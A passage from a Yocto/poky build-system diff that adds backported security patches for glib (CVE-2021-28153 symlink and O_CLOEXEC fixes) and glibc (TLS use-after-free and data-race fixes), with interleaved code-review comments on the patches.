("/file/build-filename", test_build_filename); + g_test_add_func ("/file/parent", test_parent); diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch new file mode 100644 index 0000000000..a82febd26e --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch 
@@ -0,0 +1,57 @@ +Backport of: + +From ce0eb088a68171eed3ac217cb92a72e36eb57d1b Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Wed, 10 Mar 2021 16:05:55 +0000 +Subject: [PATCH 3/5] glocalfileoutputstream: Factor out a flag check + +This clarifies the code a little. It introduces no functional changes. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-28153 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/glocalfileoutputstream.c | 7 ++++--- + 1 file changed, 4 insertions(+), 3 deletions(-) + +--- a/gio/glocalfileoutputstream.c ++++ b/gio/glocalfileoutputstream.c +@@ -847,6 +847,7 @@ handle_overwrite_open (const char *fi + int res; + int mode; + int errsv; ++ gboolean replace_destination_set = (flags & G_FILE_CREATE_REPLACE_DESTINATION); + + mode = mode_from_flags_or_info (flags, reference_info); + +@@ -954,7 +955,7 @@ handle_overwrite_open (const char *fi + * to a backup file and rewrite the contents of the file. + */ + +- if ((flags & G_FILE_CREATE_REPLACE_DESTINATION) || ++ if (replace_destination_set || + (!(original_stat.st_nlink > 1) && !is_symlink)) + { + char *dirname, *tmp_filename; +@@ -973,7 +974,7 @@ handle_overwrite_open (const char *fi + + /* try to keep permissions (unless replacing) */ + +- if ( ! (flags & G_FILE_CREATE_REPLACE_DESTINATION) && ++ if (!replace_destination_set && + ( + #ifdef HAVE_FCHOWN + fchown (tmpfd, original_stat.st_uid, original_stat.st_gid) == -1 || +@@ -1112,7 +1113,7 @@ handle_overwrite_open (const char *fi + } + } + +- if (flags & G_FILE_CREATE_REPLACE_DESTINATION) ++ if (replace_destination_set) + { + g_close (fd, NULL); + 
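Review bot: `gboolean replace_destination_set = (flags & G_FILE_CREATE_REPLACE_DESTINATION);` stores the raw flag bit in a gboolean rather than TRUE or FALSE. Every use in the visible hunks is a truth test, so behaviour is unchanged, but a later comparison against `TRUE` could fail without any warning. I would normalise the value at the definition: `gboolean replace_destination_set = (flags & G_FILE_CREATE_REPLACE_DESTINATION) != 0;`. handle_overwrite_open() starts and ends outside these hunks.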
diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch
new file mode 100644
index 0000000000..5b106e8474
--- /dev/null
+++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch
@@ -0,0 +1,265 @@ +Backport of: + +From 317b3b587058a05dca95d56dac26568c5b098d33 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Wed, 24 Feb 2021 17:36:07 +0000 +Subject: [PATCH 4/5] glocalfileoutputstream: Fix CREATE_REPLACE_DESTINATION + with symlinks +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The `G_FILE_CREATE_REPLACE_DESTINATION` flag is equivalent to unlinking +the destination file and re-creating it from scratch. That did +previously work, but in the process the code would call `open(O_CREAT)` +on the file. If the file was a dangling symlink, this would create the +destination file (empty). That’s not an intended side-effect, and has +security implications if the symlink is controlled by a lower-privileged +process. + +Fix that by not opening the destination file if it’s a symlink, and +adjusting the rest of the code to cope with + - the fact that `fd == -1` is not an error iff `is_symlink` is true, + - and that `original_stat` will contain the `lstat()` results for the + symlink now, rather than the `stat()` results for its target (again, + iff `is_symlink` is true). + +This means that the target of the dangling symlink is no longer created, +which was the bug. The symlink itself continues to be replaced (as +before) with the new file — this is the intended behaviour of +`g_file_replace()`. + +The behaviour for non-symlink cases, or cases where the symlink was not +dangling, should be unchanged. + +Includes a unit test. 
+ +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> + +Fixes: #2325 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-28153 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/glocalfileoutputstream.c | 77 ++++++++++++++++++------- + gio/tests/file.c | 108 +++++++++++++++++++++++++++++++++++ + 2 files changed, 163 insertions(+), 22 deletions(-) + +--- a/gio/glocalfileoutputstream.c ++++ b/gio/glocalfileoutputstream.c +@@ -875,16 +875,22 @@ handle_overwrite_open (const char *fi + /* Could be a symlink, or it could be a regular ELOOP error, + * but then the next open will fail too. */ + is_symlink = TRUE; +- fd = g_open (filename, open_flags, mode); ++ if (!replace_destination_set) ++ fd = g_open (filename, open_flags, mode); + } +-#else +- fd = g_open (filename, open_flags, mode); +- errsv = errno; ++#else /* if !O_NOFOLLOW */ + /* This is racy, but we do it as soon as possible to minimize the race */ + is_symlink = g_file_test (filename, G_FILE_TEST_IS_SYMLINK); ++ ++ if (!is_symlink || !replace_destination_set) ++ { ++ fd = g_open (filename, open_flags, mode); ++ errsv = errno; ++ } + #endif + +- if (fd == -1) ++ if (fd == -1 && ++ (!is_symlink || !replace_destination_set)) + { + char *display_name = g_filename_display_name (filename); + g_set_error (error, G_IO_ERROR, +@@ -898,7 +904,14 @@ handle_overwrite_open (const char *fi + #ifdef G_OS_WIN32 + res = GLIB_PRIVATE_CALL (g_win32_fstat) (fd, &original_stat); + #else +- res = fstat (fd, &original_stat); ++ if (!is_symlink) ++ { ++ res = fstat (fd, &original_stat); ++ } ++ else ++ { ++ res = lstat (filename, &original_stat); ++ } + #endif + errsv = errno; + +@@ -917,16 +930,27 @@ handle_overwrite_open (const char *fi + if (!S_ISREG (original_stat.st_mode)) + { + if (S_ISDIR (original_stat.st_mode)) +- g_set_error_literal (error, 
+- G_IO_ERROR, +- G_IO_ERROR_IS_DIRECTORY, +- _("Target file is a directory")); +- else +- g_set_error_literal (error, ++ { ++ g_set_error_literal (error, ++ G_IO_ERROR, ++ G_IO_ERROR_IS_DIRECTORY, ++ _("Target file is a directory")); ++ goto err_out; ++ } ++ else if (!is_symlink || ++#ifdef S_ISLNK ++ !S_ISLNK (original_stat.st_mode) ++#else ++ FALSE ++#endif ++ ) ++ { ++ g_set_error_literal (error, + G_IO_ERROR, + G_IO_ERROR_NOT_REGULAR_FILE, + _("Target file is not a regular file")); +- goto err_out; ++ goto err_out; ++ } + } + + if (etag != NULL) +@@ -1007,7 +1031,8 @@ handle_overwrite_open (const char *fi + } + } + +- g_close (fd, NULL); ++ if (fd >= 0) ++ g_close (fd, NULL); + *temp_filename = tmp_filename; + return tmpfd; + } +--- a/gio/tests/file.c ++++ b/gio/tests/file.c +@@ -804,6 +804,113 @@ test_replace_cancel (void) + g_object_unref (tmpdir); + } + ++static void ++test_replace_symlink (void) ++{ ++#ifdef G_OS_UNIX ++ gchar *tmpdir_path = NULL; ++ GFile *tmpdir = NULL, *source_file = NULL, *target_file = NULL; ++ GFileOutputStream *stream = NULL; ++ const gchar *new_contents = "this is a test message which should be written to source and not target"; ++ gsize n_written; ++ GFileEnumerator *enumerator = NULL; ++ GFileInfo *info = NULL; ++ gchar *contents = NULL; ++ gsize length = 0; ++ GError *local_error = NULL; ++ ++ g_test_bug ("https://gitlab.gnome.org/GNOME/glib/-/issues/2325"); ++ g_test_summary ("Test that G_FILE_CREATE_REPLACE_DESTINATION doesn’t follow symlinks"); ++ ++ /* Create a fresh, empty working directory. */ ++ tmpdir_path = g_dir_make_tmp ("g_file_replace_symlink_XXXXXX", &local_error); ++ g_assert_no_error (local_error); ++ tmpdir = g_file_new_for_path (tmpdir_path); ++ ++ g_test_message ("Using temporary directory %s", tmpdir_path); ++ g_free (tmpdir_path); ++ ++ /* Create symlink `source` which points to `target`. 
*/ ++ source_file = g_file_get_child (tmpdir, "source"); ++ target_file = g_file_get_child (tmpdir, "target"); ++ g_file_make_symbolic_link (source_file, "target", NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ /* Ensure that `target` doesn’t exist */ ++ g_assert_false (g_file_query_exists (target_file, NULL)); ++ ++ /* Replace the `source` symlink with a regular file using ++ * %G_FILE_CREATE_REPLACE_DESTINATION, which should replace it *without* ++ * following the symlink */ ++ stream = g_file_replace (source_file, NULL, FALSE /* no backup */, ++ G_FILE_CREATE_REPLACE_DESTINATION, NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ g_output_stream_write_all (G_OUTPUT_STREAM (stream), new_contents, strlen (new_contents), ++ &n_written, NULL, &local_error); ++ g_assert_no_error (local_error); ++ g_assert_cmpint (n_written, ==, strlen (new_contents)); ++ ++ g_output_stream_close (G_OUTPUT_STREAM (stream), NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ g_clear_object (&stream); ++ ++ /* At this point, there should still only be one file: `source`. It should ++ * now be a regular file. `target` should not exist. 
*/ ++ enumerator = g_file_enumerate_children (tmpdir, ++ G_FILE_ATTRIBUTE_STANDARD_NAME "," ++ G_FILE_ATTRIBUTE_STANDARD_TYPE, ++ G_FILE_QUERY_INFO_NOFOLLOW_SYMLINKS, NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ info = g_file_enumerator_next_file (enumerator, NULL, &local_error); ++ g_assert_no_error (local_error); ++ g_assert_nonnull (info); ++ ++ g_assert_cmpstr (g_file_info_get_name (info), ==, "source"); ++ g_assert_cmpint (g_file_info_get_file_type (info), ==, G_FILE_TYPE_REGULAR); ++ ++ g_clear_object (&info); ++ ++ info = g_file_enumerator_next_file (enumerator, NULL, &local_error); ++ g_assert_no_error (local_error); ++ g_assert_null (info); ++ ++ g_file_enumerator_close (enumerator, NULL, &local_error); ++ g_assert_no_error (local_error); ++ g_clear_object (&enumerator); ++ ++ /* Double-check that `target` doesn’t exist */ ++ g_assert_false (g_file_query_exists (target_file, NULL)); ++ ++ /* Check the content of `source`. */ ++ g_file_load_contents (source_file, ++ NULL, ++ &contents, ++ &length, ++ NULL, ++ &local_error); ++ g_assert_no_error (local_error); ++ g_assert_cmpstr (contents, ==, new_contents); ++ g_assert_cmpuint (length, ==, strlen (new_contents)); ++ g_free (contents); ++ ++ /* Tidy up. 
*/ ++ g_file_delete (source_file, NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ g_file_delete (tmpdir, NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ g_clear_object (&target_file); ++ g_clear_object (&source_file); ++ g_clear_object (&tmpdir); ++#else /* if !G_OS_UNIX */ ++ g_test_skip ("Symlink replacement tests can only be run on Unix") ++#endif ++} ++ + static void + on_file_deleted (GObject *object, + GAsyncResult *result, +@@ -1752,6 +1859,7 @@ main (int argc, char *argv[]) + g_test_add_data_func ("/file/async-create-delete/4096", GINT_TO_POINTER (4096), test_create_delete); + g_test_add_func ("/file/replace-load", test_replace_load); + g_test_add_func ("/file/replace-cancel", test_replace_cancel); ++ g_test_add_func ("/file/replace-symlink", test_replace_symlink); + g_test_add_func ("/file/async-delete", test_async_delete); + #ifdef G_OS_UNIX + g_test_add_func ("/file/copy-preserve-mode", test_copy_preserve_mode); diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch new file mode 100644 index 0000000000..2334147f7d --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch 
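Review bot: In the `#else /* if !O_NOFOLLOW */` branch of `handle_overwrite_open`, `fd` is no longer assigned when `is_symlink && replace_destination_set`, yet it is read immediately afterwards by `if (fd == -1 && (!is_symlink || !replace_destination_set))` and later by `if (fd >= 0) g_close (fd, NULL);`. The declaration of `fd` is outside these hunks, so it should be confirmed that it is initialised, e.g. `int fd = -1;`; otherwise this fallback path reads an indeterminate value and may close an unrelated descriptor. The `g_close (fd, NULL)` inside the `if (replace_destination_set)` block, visible as context in CVE-2021-28153-3.patch, is not guarded the same way and would presumably see `fd == -1` if the temporary-file path falls through; `if (fd >= 0)` there would keep the two sites consistent. The diffstat in the header (77 changed lines in gio/glocalfileoutputstream.c) also appears larger than the hunks carried here, so the header should state which upstream hunks this backport leaves out.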
@@ -0,0 +1,55 @@
+From 6c6439261bc7a8a0627519848a7222b3e1bd4ffe Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:42:24 +0000
+Subject: [PATCH 5/5] glocalfileoutputstream: Add a missing O_CLOEXEC flag to
+ replace()
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -58,6 +58,12 @@
+ #define O_BINARY 0
+ #endif
+
++#ifndef O_CLOEXEC
++#define O_CLOEXEC 0
++#else
++#define HAVE_O_CLOEXEC 1
++#endif
++
+ struct _GLocalFileOutputStreamPrivate {
+ char *tmp_filename;
+ char *original_filename;
+@@ -1223,7 +1229,7 @@ _g_local_file_output_stream_replace (con
+ sync_on_close = FALSE;
+
+ /* If the file doesn't exist, create it */
+- open_flags = O_CREAT | O_EXCL | O_BINARY;
++ open_flags = O_CREAT | O_EXCL | O_BINARY | O_CLOEXEC;
+ if (readable)
+ open_flags |= O_RDWR;
+ else
+@@ -1253,8 +1259,11 @@ _g_local_file_output_stream_replace (con
+ set_error_from_open_errno (filename, error);
+ return NULL;
+ }
+-
+-
++#if !defined(HAVE_O_CLOEXEC) && defined(F_SETFD)
++ else
++ fcntl (fd, F_SETFD, FD_CLOEXEC);
++#endif
++
+ stream = g_object_new (G_TYPE_LOCAL_FILE_OUTPUT_STREAM, NULL);
+ stream->priv->fd = fd;
+ stream->priv->sync_on_close = sync_on_close;
diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb b/poky/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
index 1a006b9f38..c2145bc6c2 100644
--- a/poky/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
+++ b/poky/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
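Review bot: The `fcntl (fd, F_SETFD, FD_CLOEXEC);` fallback added after the open in `_g_local_file_output_stream_replace` (CVE-2021-28153-5.patch) ignores its return value and is not atomic with the open. On builds where `O_CLOEXEC` ends up defined as 0, a fork and exec in another thread can therefore still inherit the descriptor. That cannot be fixed in this backport, but it deserves a comment beside the `#if !defined(HAVE_O_CLOEXEC) && defined(F_SETFD)` block, e.g. `/* Best effort: not atomic with open(), a concurrent fork+exec may still inherit fd */`. Only the `O_CREAT | O_EXCL` create path gains the flag here; whether the `g_open` calls in `handle_overwrite_open` set it depends on `open_flags` there, which is outside the hunk, as is the rest of this function's body.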
@@ -18,6 +18,30 @@ SRC_URI = "${GNOME_MIRROR}/glib/${SHRT_VER}/glib-${PV}.tar.xz \ file://0001-gio-tests-resources.c-comment-out-a-build-host-only-.patch \ file://tzdata-update.patch \ file://CVE-2020-35457.patch \ + file://CVE-2021-27218.patch \ + file://CVE-2021-27219-01.patch \ + file://CVE-2021-27219-02.patch \ + file://CVE-2021-27219-03.patch \ + file://CVE-2021-27219-04.patch \ + file://CVE-2021-27219-05.patch \ + file://CVE-2021-27219-06.patch \ + file://CVE-2021-27219-07.patch \ + file://CVE-2021-27219-08.patch \ + file://CVE-2021-27219-09.patch \ + file://CVE-2021-27219-10.patch \ + file://CVE-2021-27219-11.patch \ + file://CVE-2021-27219-reg1-1.patch \ + file://CVE-2021-27219-reg1-2.patch \ + file://CVE-2021-27219-reg1-4.patch \ + file://CVE-2021-27219-reg1-5.patch \ + file://CVE-2021-27219-reg2-1.patch \ + file://CVE-2021-27219-reg2-2.patch \ + file://CVE-2021-27219-reg2-3.patch \ + file://CVE-2021-28153-1.patch \ + file://CVE-2021-28153-2.patch \ + file://CVE-2021-28153-3.patch \ + file://CVE-2021-28153-4.patch \ + file://CVE-2021-28153-5.patch \ " SRC_URI_append_class-native = " file://relocate-modules.patch" diff --git a/poky/meta/recipes-core/glibc/cross-localedef-native_2.31.bb b/poky/meta/recipes-core/glibc/cross-localedef-native_2.31.bb index 24de55d929..9aa24eccfe 100644 --- a/poky/meta/recipes-core/glibc/cross-localedef-native_2.31.bb +++ b/poky/meta/recipes-core/glibc/cross-localedef-native_2.31.bb @@ -20,7 +20,7 @@ inherit autotools FILESEXTRAPATHS =. "${FILE_DIRNAME}/${PN}:${FILE_DIRNAME}/glibc:" SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \ - git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef \ + git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef;protocol=https \ \ file://0001-localedef-Add-hardlink-resolver-to-build.patch;patchdir=localedef \ \ 
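Review bot: The `SRC_URI` additions in glib-2.0_2.62.6.bb (the first hunk above) list `CVE-2021-27219-reg1-1`, `-reg1-2`, `-reg1-4` and `-reg1-5` but no `CVE-2021-27219-reg1-3.patch`, while the `reg2` series is contiguous. If the third regression fix was left out on purpose, for example because it does not apply to 2.62.6, that should be recorded in the commit message or in the header of `CVE-2021-27219-reg1-4.patch`. If it was not deliberate, the missing entry needs adding, because a partially applied regression series is hard to audit against the upstream fix set.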
diff --git a/poky/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch b/poky/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch
new file mode 100644
index 0000000000..dba491f4dc
--- /dev/null
+++ b/poky/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch
@@ -0,0 +1,66 @@ +From c0669ae1a629e16b536bf11cdd0865e0dbcf4bee Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy <szabolcs.nagy@arm.com> +Date: Wed, 30 Dec 2020 21:52:38 +0000 +Subject: [PATCH] elf: Refactor _dl_update_slotinfo to avoid use after free + +map is not valid to access here because it can be freed by a concurrent +dlclose: during tls access (via __tls_get_addr) _dl_update_slotinfo is +called without holding dlopen locks. So don't check the modid of map. + +The map == 0 and map != 0 code paths can be shared (avoiding the dtv +resize in case of map == 0 is just an optimization: larger dtv than +necessary would be fine too). + +Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org> +--- + elf/dl-tls.c | 21 +++++---------------- + 1 file changed, 5 insertions(+), 16 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=c0669ae1a629e16b536bf11cdd0865e0dbcf4bee] +Signed-off-by: Akash Hadke <akash.hadke@kpit.com> +Signed-off-by: Akash Hadke <hadkeakash4@gmail.com> +--- +diff --git a/elf/dl-tls.c b/elf/dl-tls.c +index 24d00c14ef..f8b32b3ecb 100644 +--- a/elf/dl-tls.c ++++ b/elf/dl-tls.c +@@ -743,6 +743,8 @@ _dl_update_slotinfo (unsigned long int req_modid) + { + for (size_t cnt = total == 0 ? 1 : 0; cnt < listp->len; ++cnt) + { ++ size_t modid = total + cnt; ++ + size_t gen = listp->slotinfo[cnt].gen; + + if (gen > new_gen) +@@ -758,25 +760,12 @@ _dl_update_slotinfo (unsigned long int req_modid) + + /* If there is no map this means the entry is empty. */ + struct link_map *map = listp->slotinfo[cnt].map; +- if (map == NULL) +- { +- if (dtv[-1].counter >= total + cnt) +- { +- /* If this modid was used at some point the memory +- might still be allocated. */ +- free (dtv[total + cnt].pointer.to_free); +- dtv[total + cnt].pointer.val = TLS_DTV_UNALLOCATED; +- dtv[total + cnt].pointer.to_free = NULL; +- } +- +- continue; +- } +- + /* Check whether the current dtv array is large enough. 
*/ +- size_t modid = map->l_tls_modid; +- assert (total + cnt == modid); + if (dtv[-1].counter < modid) + { ++ if (map == NULL) ++ continue; ++ + /* Resize the dtv. */ + dtv = _dl_resize_dtv (dtv); + +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch b/poky/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch new file mode 100644 index 0000000000..25beee1d50 --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch 
@@ -0,0 +1,191 @@ +From 1387ad6225c2222f027790e3f460e31aa5dd2c54 Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy <szabolcs.nagy@arm.com> +Date: Wed, 30 Dec 2020 19:19:37 +0000 +Subject: [PATCH] elf: Fix data races in pthread_create and TLS access [BZ + #19329] + +DTV setup at thread creation (_dl_allocate_tls_init) is changed +to take the dlopen lock, GL(dl_load_lock). Avoiding data races +here without locks would require design changes: the map that is +accessed for static TLS initialization here may be concurrently +freed by dlclose. That use after free may be solved by only +locking around static TLS setup or by ensuring dlclose does not +free modules with static TLS, however currently every link map +with TLS has to be accessed at least to see if it needs static +TLS. And even if that's solved, still a lot of atomics would be +needed to synchronize DTV related globals without a lock. So fix +both bug 19329 and bug 27111 with a lock that prevents DTV setup +running concurrently with dlopen or dlclose. + +_dl_update_slotinfo at TLS access still does not use any locks +so CONCURRENCY NOTES are added to explain the synchronization. +The early exit from the slotinfo walk when max_modid is reached +is not strictly necessary, but does not hurt either. + +An incorrect acquire load was removed from _dl_resize_dtv: it +did not synchronize with any release store or fence and +synchronization is now handled separately at thread creation +and TLS access time. + +There are still a number of racy read accesses to globals that +will be changed to relaxed MO atomics in a followup patch. This +should not introduce regressions compared to existing behaviour +and avoid cluttering the main part of the fix. + +Not all TLS access related data races got fixed here: there are +additional races at lazy tlsdesc relocations see bug 27137. 
+ +Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org> +--- + elf/dl-tls.c | 63 +++++++++++++++++++++++++++++++++++++++------------- + 1 file changed, 47 insertions(+), 16 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=1387ad6225c2222f027790e3f460e31aa5dd2c54] +Signed-off-by: Akash Hadke <akash.hadke@kpit.com> +Signed-off-by: Akash Hadke <hadkeakash4@gmail.com> +--- +diff --git a/elf/dl-tls.c b/elf/dl-tls.c +index 6baff0c1ea..94f3cdbae0 100644 +--- a/elf/dl-tls.c ++++ b/elf/dl-tls.c +@@ -475,14 +475,11 @@ extern dtv_t _dl_static_dtv[]; + #endif + + static dtv_t * +-_dl_resize_dtv (dtv_t *dtv) ++_dl_resize_dtv (dtv_t *dtv, size_t max_modid) + { + /* Resize the dtv. */ + dtv_t *newp; +- /* Load GL(dl_tls_max_dtv_idx) atomically since it may be written to by +- other threads concurrently. */ +- size_t newsize +- = atomic_load_acquire (&GL(dl_tls_max_dtv_idx)) + DTV_SURPLUS; ++ size_t newsize = max_modid + DTV_SURPLUS; + size_t oldsize = dtv[-1].counter; + + if (dtv == GL(dl_initial_dtv)) +@@ -528,11 +525,14 @@ _dl_allocate_tls_init (void *result) + size_t total = 0; + size_t maxgen = 0; + ++ /* Protects global dynamic TLS related state. */ ++ __rtld_lock_lock_recursive (GL(dl_load_lock)); ++ + /* Check if the current dtv is big enough. */ + if (dtv[-1].counter < GL(dl_tls_max_dtv_idx)) + { + /* Resize the dtv. */ +- dtv = _dl_resize_dtv (dtv); ++ dtv = _dl_resize_dtv (dtv, GL(dl_tls_max_dtv_idx)); + + /* Install this new dtv in the thread data structures. */ + INSTALL_DTV (result, &dtv[-1]); +@@ -600,6 +600,7 @@ _dl_allocate_tls_init (void *result) + listp = listp->next; + assert (listp != NULL); + } ++ __rtld_lock_unlock_recursive (GL(dl_load_lock)); + + /* The DTV version is up-to-date now. 
*/ + dtv[0].counter = maxgen; +@@ -734,12 +735,29 @@ _dl_update_slotinfo (unsigned long int req_modid) + + if (dtv[0].counter < listp->slotinfo[idx].gen) + { +- /* The generation counter for the slot is higher than what the +- current dtv implements. We have to update the whole dtv but +- only those entries with a generation counter <= the one for +- the entry we need. */ ++ /* CONCURRENCY NOTES: ++ ++ Here the dtv needs to be updated to new_gen generation count. ++ ++ This code may be called during TLS access when GL(dl_load_lock) ++ is not held. In that case the user code has to synchronize with ++ dlopen and dlclose calls of relevant modules. A module m is ++ relevant if the generation of m <= new_gen and dlclose of m is ++ synchronized: a memory access here happens after the dlopen and ++ before the dlclose of relevant modules. The dtv entries for ++ relevant modules need to be updated, other entries can be ++ arbitrary. ++ ++ This e.g. means that the first part of the slotinfo list can be ++ accessed race free, but the tail may be concurrently extended. ++ Similarly relevant slotinfo entries can be read race free, but ++ other entries are racy. However updating a non-relevant dtv ++ entry does not affect correctness. For a relevant module m, ++ max_modid >= modid of m. */ + size_t new_gen = listp->slotinfo[idx].gen; + size_t total = 0; ++ size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx)); ++ assert (max_modid >= req_modid); + + /* We have to look through the entire dtv slotinfo list. */ + listp = GL(dl_tls_dtv_slotinfo_list); +@@ -749,12 +767,14 @@ _dl_update_slotinfo (unsigned long int req_modid) + { + size_t modid = total + cnt; + ++ /* Later entries are not relevant. */ ++ if (modid > max_modid) ++ break; ++ + size_t gen = listp->slotinfo[cnt].gen; + + if (gen > new_gen) +- /* This is a slot for a generation younger than the +- one we are handling now. It might be incompletely +- set up so ignore it. */ ++ /* Not relevant. 
*/ + continue; + + /* If the entry is older than the current dtv layout we +@@ -771,7 +791,7 @@ _dl_update_slotinfo (unsigned long int req_modid) + continue; + + /* Resize the dtv. */ +- dtv = _dl_resize_dtv (dtv); ++ dtv = _dl_resize_dtv (dtv, max_modid); + + assert (modid <= dtv[-1].counter); + +@@ -793,8 +813,17 @@ _dl_update_slotinfo (unsigned long int req_modid) + } + + total += listp->len; ++ if (total > max_modid) ++ break; ++ ++ /* Synchronize with _dl_add_to_slotinfo. Ideally this would ++ be consume MO since we only need to order the accesses to ++ the next node after the read of the address and on most ++ hardware (other than alpha) a normal load would do that ++ because of the address dependency. */ ++ listp = atomic_load_acquire (&listp->next); + } +- while ((listp = listp->next) != NULL); ++ while (listp != NULL); + + /* This will be the new maximum generation counter. */ + dtv[0].counter = new_gen; +@@ -986,7 +1015,7 @@ _dl_add_to_slotinfo (struct link_map *l, bool do_add) + the first slot. */ + assert (idx == 0); + +- listp = prevp->next = (struct dtv_slotinfo_list *) ++ listp = (struct dtv_slotinfo_list *) + malloc (sizeof (struct dtv_slotinfo_list) + + TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo)); + if (listp == NULL) +@@ -1000,6 +1029,8 @@ cannot create TLS data structures")); + listp->next = NULL; + memset (listp->slotinfo, '\0', + TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo)); ++ /* Synchronize with _dl_update_slotinfo. */ ++ atomic_store_release (&prevp->next, listp); + } + + /* Add the information into the slotinfo data structure. */ +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch b/poky/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch new file mode 100644 index 0000000000..eb8ef3161c --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch 
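Review bot: `_dl_allocate_tls_init` now takes `GL(dl_load_lock)` around the whole DTV setup (patch 0031), so every thread creation serialises with `dlopen` and `dlclose`. If the loader runs module constructors while holding that lock (I believe it does, but that is not visible here), a constructor that waits on another thread which is itself creating a thread would deadlock. The patch header should say whether upstream carries a follow-up for this lock ordering and whether it is needed on this glibc 2.31 backport. The unlock sits right after the slotinfo walk, before `dtv[0].counter = maxgen;`, and the locked region extends outside the hunk, so it should also be checked that no early exit there skips `__rtld_lock_unlock_recursive (GL(dl_load_lock));`.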
@@ -0,0 +1,206 @@ +From f4f8f4d4e0f92488431b268c8cd9555730b9afe9 Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy <szabolcs.nagy@arm.com> +Date: Wed, 30 Dec 2020 19:19:37 +0000 +Subject: [PATCH] elf: Use relaxed atomics for racy accesses [BZ #19329] + +This is a follow up patch to the fix for bug 19329. This adds relaxed +MO atomics to accesses that were previously data races but are now +race conditions, and where relaxed MO is sufficient. + +The race conditions all follow the pattern that the write is behind the +dlopen lock, but a read can happen concurrently (e.g. during tls access) +without holding the lock. For slotinfo entries the read value only +matters if it reads from a synchronized write in dlopen or dlclose, +otherwise the related dtv entry is not valid to access so it is fine +to leave it in an inconsistent state. The same applies for +GL(dl_tls_max_dtv_idx) and GL(dl_tls_generation), but there the +algorithm relies on the fact that the read 